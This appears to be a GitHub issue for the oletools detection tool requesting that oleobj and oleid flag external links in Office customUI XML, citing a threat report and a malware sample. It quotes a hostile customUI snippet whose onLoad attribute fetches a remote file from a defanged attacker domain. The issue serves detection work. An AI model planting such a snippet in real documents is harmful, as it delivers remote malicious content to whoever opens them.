oleobj: add detection for customUI external links

[decalage2]

See this article: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html Sample: https://bazaar.abuse.ch/sample/f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4/

Example:

<customUI xmlns="http://schemas.microsoft.com/office/2006/01/customui" onLoad='https://wordkeyvpload[.]net/keys/parliament_rew.xls!123'> </customUI>

• also update oleid to report it.

[christian-intra2net]

If this sample is publicly available, could we add it to our unit test samples and check that the customUI-threat is also detected in the future?